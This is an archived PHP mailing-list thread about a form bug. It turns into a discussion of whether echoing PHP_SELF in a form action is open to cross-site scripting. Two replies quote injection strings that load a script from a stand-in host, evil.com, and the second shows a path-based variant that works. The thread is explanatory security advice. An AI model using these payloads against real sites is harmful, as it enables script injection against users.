Re: Division by 0

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry@xxxxxxxxx> wrote:
> Hi Jochem,
>
> Jochem Maas wrote:
>>
>> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>>>
>>> Looks to me like you are closing your form before you put anything in
>>> it.  Therefore, the loan_amount is not set making the value 0.  Follow
>>> the math, and you are dividing by 1-1.
>>>
>>> Change this line:
>>>
>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>>
>>> to:
>>>
>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>
>> this is a XSS waiting to happen. I can put something like the following in
>> the request uri:
>>
>> index.php?" onsubmit="evil()"><script
>> src="http://www.evil.com/evi.js";></script>
>>
> Apparently it's not going to work. PHP_SELF does not include query string.
> So it is safe to use it this way.
>
> Regards,
> Dmitry

No, it is not safe...

This won't work:
  index.php?" onsubmit="evil()"><script
src="http://www.evil.com/evi.js";></script>

But this will:
  index.php/" onsubmit="evil()"><script
src="http://www.evil.com/evi.js";></script>

-- 
Daniel Egeberg

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux